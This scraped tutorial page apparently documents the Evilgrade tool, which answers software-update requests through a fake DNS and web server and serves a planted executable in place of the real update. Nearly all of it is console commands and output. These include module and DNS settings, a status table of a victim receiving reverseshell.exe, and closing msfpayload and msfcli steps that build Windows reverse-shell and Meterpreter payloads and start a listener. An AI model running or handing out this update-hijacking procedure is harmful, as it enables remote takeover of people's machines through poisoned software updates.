Hacking with Evilgrade
[Youtube Data] Public Data - [Evilgrade]
제목 : Hacking with Evilgrade
내용 :
Description :
Commandsevilgrade>configure sunjava evilgrade(sunjava)> evilgrade>conf sunjava evilgrade(sunjava)> ## 'conf' takes us back to the global configuration evilgrade(sunjava)>conf evilgrade> ## reload - Reload to get all modules update (to refresh loaded modules, useful on development) start - Start webserver stop - Stop webserver (fake update server)evilgrade>start evilgrade> [28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ... evilgrade> [28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ... ####################################### Example: ------- evilgrade>stop Stopping WEBSERVER [OK] Stopping DNSSERVER [OK] ####################################### restart - Restart services (WebServer and DNS Server) stops and starts again ####################################### status - Get webserver and victims status Example: ------- evilgrade>show status Webserver (pid 4134) already running Users status: ============ .---------------------------------------------------------------------------------------------------------------. | Client | Module | Status | Md5,Cmd,File | +----------------+------------------+--------+------------------------------------------------------------------+ | 192.168.233.10 | modules::sunjava | send | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe" | '----------------+------------------+--------+------------------------------------------------------------------' ####################################### show - Display information of <object>. ####################################### show active - Display active modules in the webserver ####################################### show modules - Display implemented modules ######################################### show options - Display modules/global options Example: ------- evilgrade>show options Display options: =============== .-----------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-----------+---------------------------------------------------------+ | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) | | DNSPort | 53 | Listen Name Server port | | debug | 1 | Debug mode | | port | 80 | Webserver listening port | | sslport | 443 | Webserver SSL listening port | '-------------+-----------+---------------------------------------------------------' evilgrade> evilgrade(notepadplus)>conf vmware evilgrade(vmware)>show options (without started services) Display options: =============== Name = VMware Server Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "www.vmware.com" .----------------------------------------------. | Name | Default | Description | +--------+-------------------+-----------------+ | enable | 1 | Status | | agent | ./agent/agent.exe | Agent to inject | '--------+-------------------+-----------------' evilgrade(vmware)>show options (with started services after setting agent) Display options: =============== Name = VMware Server Version = 1.0 Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"] Description = "" VirtualHost = "www.vmware.com" .--------------------------------------------------------------------------------------------------. | Name | Default | Description | +-------------+------------------------------------------------------------------+-----------------+ | enable | 1 | Status | | agentmd5 | f80af637642170507bda998b6f2015fa | | | agentsize | 54576 | | | agent | ./agent/agent.exe | Agent to inject | | agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd | | '-------------+------------------------------------------------------------------+-----------------' ######################################### set - Configure variables global or modules Example: ------- evilgrade>show options Display options: =============== .-----------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-----------+---------------------------------------------------------+ | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip ) | | DNSPort | 53 | Listen Name Server port | | debug | 0 | Debug mode | | port | 80 | Webserver listening port | | sslport | 443 | Webserver SSL listening port | '-------------+-----------+---------------------------------------------------------' ###Let's enable DEBUG option and set as DNSAnswerIp our Inet address (192.168.1.4) evilgrade>set debug 1 #Enable debug set debug, 1 evilgrade>set DNSAnswerIp 192.168.1.4 #Ip where evilgrade's DNS Server is listening set DNSAnswerIp, 192.168.1.4 evilgrade>show options Display options: =============== .-------------------------------------------------------------------------------------. | Name | Default | Description | +-------------+-------------+---------------------------------------------------------+ | DNSEnable | 1 | Enable DNS Server ( handle virtual request on modules ) | | DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip ) | | DNSPort | 53 | Listen Name Server port | | debug | 1 | Debug mode | | port | 80 | Webserver listening port | | sslport | 443 | Webserver SSL listening port | '-------------+-------------+---------------------------------------------------------' ############################### exit - exits the program ####################################### help - prints this screen, or help on 'command' #######################################
evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'[team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exeevilgrade(sunjava)>set agent /tmp/reverse-shell.exe[team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E [*] Started reverse handler on 192.168.100.2:4444 [*] Starting the payload handler...
PreviousKADABRA: Automatic LFI Exploiter (all LFI attacks implemented)NextMsfvenom Payload Creator(MPC) in Kali Linux
Last updated